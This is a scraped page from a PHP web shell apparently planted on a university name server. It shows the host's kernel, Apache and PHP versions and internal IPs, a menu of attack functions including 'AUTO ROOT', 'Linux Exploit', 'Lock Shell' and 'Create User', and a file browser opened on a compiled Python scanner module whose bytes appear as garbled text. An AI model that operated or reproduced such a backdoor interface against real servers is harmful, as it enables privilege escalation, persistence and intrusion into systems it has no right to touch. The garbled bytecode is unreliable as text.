Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
hplip /
scan /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
126
B
-rw-r--r--
sane.cpython-310.pyc
14.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sane.cpython-310.pyc
o �/�aR � @ s d dl Z d dlZd dlZd dlT d dlmZ d dlmZ d dlm Z e� d�ZdZej dejd ejd ejdejdejd iZejdejdejdejdejdejdejdiZdZG dd� d�ZG dd� d�ZG dd� de j�Z dd� Z!dd� Z"d d!� Z#d&d"d#�Z$d$d%� Z%dS )'� N)�*)�utils�� to_bytes_utf8)�queue�scanext� � TYPE_BOOL�TYPE_INT� TYPE_FIXED�TYPE_STRING�TYPE_BUTTON� TYPE_GROUP� UNIT_NONE� UNIT_PIXEL�UNIT_BIT�UNIT_MM�UNIT_DPI�UNIT_PERCENT�UNIT_MICROSECONDi c @ s8 e Zd ZdZdd� Zdd� Zdd� Zdd � Zd d� ZdS ) �OptionaN Class representing a SANE option. Attributes: index -- number from 0 to n, giving the option number name -- a string uniquely identifying the option title -- single-line string containing a title for the option desc -- a long string describing the option; useful as a help message type -- type of this option. Possible values: TYPE_BOOL, TYPE_INT, TYPE_STRING, and so forth. unit -- units of this option. Possible values: UNIT_NONE, UNIT_PIXEL, etc. size -- size of the value in bytes cap -- capabilities available; CAP_EMULATED, CAP_SOFT_SELECT, etc. constraint -- constraint on values. Possible values: None : No constraint (min,max,step) Integer values, from min to max, stepping by list of integers or strings: only the listed values are allowed c C s\ dd l }|| _|\ | _| _| _| _| _| _| _| _ | _ t| j�td�kr,t| j�| _d S d S )Nr � )�string� cur_device�index�name�title�desc�type�unit�size�cap� constraint�str)�self�argsr r � r&